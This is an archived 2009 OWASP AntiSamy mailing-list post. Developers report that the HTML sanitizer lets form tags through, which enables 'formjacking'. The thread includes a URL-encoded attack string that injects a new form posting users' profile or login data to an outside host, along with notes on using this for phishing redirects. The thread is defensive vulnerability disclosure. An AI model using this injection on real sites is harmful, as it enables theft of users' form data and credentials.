[Owasp-antisamy] New attack technique affects antisamy

Jerry Hoff jerry.hoff at aspectsecurity.com
Fri Mar 13 11:27:16 EDT 2009


While testing antisamy.net last night, I noticed some very strange behavior concerning the form tag. Formjacking anyone?  Here is the ensuing conversation.



-----Original Message-----
From: Jerry Hoff
Sent: Fri 3/13/2009 10:21 AM
To: Arshan Dabirsiaghi
Cc: Jason Li
Subject: poor man's unchecked redirect

Hey guys,

Last night i noticed some of the style sheets allow the form element.  We should probably remove that.

attack string:
http://i8jesus.com:9080/AntiSamyDemoWebApp/test.jsp?profile=%3C%2Fform%3E%3Cform+action%3D%22http%3A%2F%2Fwww.google.com%22%3E&policy=antisamy-myspace-1.2.xml#08027181340889056708

Now, when the user hits the "update profile" button, the user will be redirected to google.com and google steals the form data. 

Jerry




From: Jason Li
Sent: Fri 3/13/2009 10:40 AM
To: Jerry Hoff; Arshan Dabirsiaghi
Subject: RE: poor man's unchecked redirect

This isn't a stylesheet problem - it's a problem in the form tag.

It's actually interesting behavior... I wouldn't have expected the form action to fire since the Update Profile button is part of a different form.

I haven't tried this in IE, but I'm thinking Firefox doesn't correctly interpret the <form ... /> as one, empty element (i.e. it doesn't recognize the implicit </form> in that tag). As a result it swallows our form due to some browser quirk.

Incidentally, these are good conversations - but I think we should be having them on the mailing list in the future for archival purposes.

-Jason





-----Original Message-----
From: Arshan Dabirsiaghi
Sent: Fri 3/13/2009 10:58 AM
To: Jason Li; Jerry Hoff
Subject: RE: poor man's unchecked redirect

I immediately Googled with Jerry on this. It works in IE too. Definitely a cross-browser "bug" even though it smacks of intended behavior. The same behavior works with empty i, b and u tags. Self-contained tags == affect the rest of the page for some reason.
 
Jerry, why don't you fwd this to the AntiSamy list? It's a new, useful attack technique and I think we'll have to whitelist the form actions to only point to good.com to prevent this type of attack.
 
Immediately what I can see an attacker doing is:

    * use it to steal data (what if that form was a login form rather than a profile update?)
    * as Jerry points out, unchecked redirect to a phishing page

Arshan
-------------- next part --------------
An HTML attachment was scrubbed...
URL: https://lists.owasp.org/pipermail/owasp-antisamy/attachments/20090313/f5695276/attachment.html 


More information about the Owasp-antisamy mailing list